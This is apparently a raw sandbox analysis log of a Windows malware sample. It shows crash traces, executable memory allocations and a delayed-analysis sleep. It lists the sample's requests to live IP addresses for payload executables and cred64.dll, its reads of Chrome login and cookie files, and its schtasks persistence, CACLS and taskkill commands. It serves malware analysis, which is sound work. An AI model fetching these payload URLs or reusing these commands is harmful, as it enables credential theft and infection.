DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71ff264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71ff2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x720a74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x720a7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72131dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72131e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72131f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7213416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1502140
registers.edi: 0
registers.eax: 1502140
registers.ebp: 1502220
registers.edx: 0
registers.ebx: 4937672
registers.esi: 4287648
registers.ecx: 2475455189
1 0 0

__exception__

 stacktrace: 
0xa375f4
0xa37516
0xa324dd
0xa320b6
0xa305a0
0xa3006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71fe2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71ff264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71ff2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x720a74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x720a7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72131dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72131e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72131f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7213416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa376e8
registers.esp: 3468568
registers.edi: 3468620
registers.eax: 0
registers.ebp: 3468632
registers.edx: 3957368
registers.ebx: 3469524
registers.esi: 42038680
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x980004
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 fc 76
exception.instruction: call qword ptr [rip + 0x91f16]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x980004
registers.r14: 258011384
registers.r15: 84809136
registers.rcx: 1308
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 258010640
registers.rsp: 258010360
registers.r11: 258014256
registers.r8: 2004779404
registers.r9: 0
registers.rdx: 1364
registers.r12: 258011000
registers.rbp: 258010496
registers.rdi: 51999680
registers.rax: 9961472
registers.r13: 84361792
1 0 0

__exception__

 stacktrace: 
0x7c742c
0x7c734e
0x7c24dd
0x7c20b6
0x7c05a0
0x7c006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71942652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7195264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71952e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71a074ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71a07610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71a91dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71a91e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71a91f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71a9416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7c7520
registers.esp: 2354728
registers.edi: 2354780
registers.eax: 0
registers.ebp: 2354792
registers.edx: 6364928
registers.ebx: 2355684
registers.esi: 36855816
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://31.41.244.237/jg94cVd30f/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://31.41.244.237/jg94cVd30f/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://31.41.244.253/new/linda5.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://31.41.244.253/goga/nash.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://31.41.244.188/ano/anon.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.6/newlege.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://62.204.41.6/p9cWxH/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://62.204.41.6/p9cWxH/index.php?scr=1
suspicious_features GET method with no useragent header suspicious_request GET http://www.aculpainting.com/mp3studios97/mp3studios_97.exe
suspicious_features GET method with no useragent header suspicious_request GET http://www.aculpainting.com/mp3studios_97.exe
suspicious_features GET method with no useragent header suspicious_request GET http://transfer.sh/get/gI6LT0/loader.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://31.41.244.237/jg94cVd30f/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://31.41.244.253/miha/wish.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.6/p9cWxH/Plugins/cred64.dll
request POST http://31.41.244.237/jg94cVd30f/index.php
request POST http://31.41.244.237/jg94cVd30f/index.php?scr=1
request GET http://31.41.244.253/new/linda5.exe
request GET http://31.41.244.253/goga/nash.exe
request GET http://31.41.244.188/ano/anon.exe
request GET http://62.204.41.6/newlege.exe
request POST http://62.204.41.6/p9cWxH/index.php
request POST http://62.204.41.6/p9cWxH/index.php?scr=1
request GET http://www.aculpainting.com/mp3studios97/mp3studios_97.exe
request GET http://www.aculpainting.com/mp3studios_97.exe
request GET http://transfer.sh/get/gI6LT0/loader.exe
request GET http://31.41.244.237/jg94cVd30f/Plugins/cred64.dll
request GET http://31.41.244.253/miha/wish.exe
request GET http://62.204.41.6/p9cWxH/Plugins/cred64.dll
request GET https://www.icodeps.com/
request POST http://31.41.244.237/jg94cVd30f/index.php
request POST http://31.41.244.237/jg94cVd30f/index.php?scr=1
request POST http://62.204.41.6/p9cWxH/index.php
request POST http://62.204.41.6/p9cWxH/index.php?scr=1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2768
region_size: 1867776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02180000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2768
region_size: 1867776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02350000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2768
region_size: 1081344
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2768
region_size: 1093632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02630000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2768
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00890000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00700000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3028
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3028
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71fe2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00532000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00565000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00567000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00556000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00558000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00caf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ca0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ca1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b05000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b06000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b07000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ca2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description gntuud.exe tried to sleep 331 seconds, actually delayed analysis time by 331 seconds
Application Crash Process chrome.exe with pid 2376 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x980004
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 fc 76
exception.instruction: call qword ptr [rip + 0x91f16]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x980004
registers.r14: 258011384
registers.r15: 84809136
registers.rcx: 1308
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 258010640
registers.rsp: 258010360
registers.r11: 258014256
registers.r8: 2004779404
registers.r9: 0
registers.rdx: 1364
registers.r12: 258011000
registers.rbp: 258010496
registers.rdi: 51999680
registers.rax: 9961472
registers.r13: 84361792
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 1\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\f13cd130-bd44-4180-a60f-3cfe14b0b6ef.dmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6391B3E5-948.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js
file C:\Users\test22\AppData\Roaming\85f469ce401df1\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
file C:\Users\test22\AppData\Local\Temp\1000061001\linda5.exe
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js
file C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
file C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
file C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js
file C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js
file C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline cmd.exe /c taskkill /f /im chrome.exe
